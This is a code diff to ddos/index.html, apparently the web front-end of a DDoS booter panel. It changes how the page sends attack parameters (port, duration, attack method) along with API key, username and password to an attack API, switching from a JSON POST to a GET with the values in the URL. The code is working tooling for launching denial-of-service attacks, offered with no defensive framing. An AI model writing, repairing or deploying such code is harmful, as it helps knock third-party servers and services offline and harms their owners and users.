--- a/ddos/index.html
+++ b/ddos/index.html
@@ -142,7 +142,7 @@
             const time_duration = document.getElementById("time").value;
             const method = document.getElementById("method").value;
 
-            const dataddos = {
+            const dataddos = new URLSearchParams({
                 key: API_KEY,
                 username: API_USERNAME,
                 password: PASSWORD,
@@ -150,14 +150,15 @@
                 port: port,
                 time: time_duration,
                 method: method
-            };
+            });
 
-            fetch(API_URL, {
-                method: "POST",  // Change to POST if required by the API
+            const urlWithParams = `${API_URL}?${dataddos.toString()}`;
+
+            fetch(urlWithParams, {
+                method: "GET",  // Use GET request method
                 headers: {
                     "Content-Type": "application/json"
                 },
-                body: JSON.stringify(dataddos), // Send data as JSON
             })
             .then(response => {
                 if (!response.ok) {
@@ -173,6 +174,5 @@
             });
         }
     </script>
-
 </body>
-</html>
+            </html>
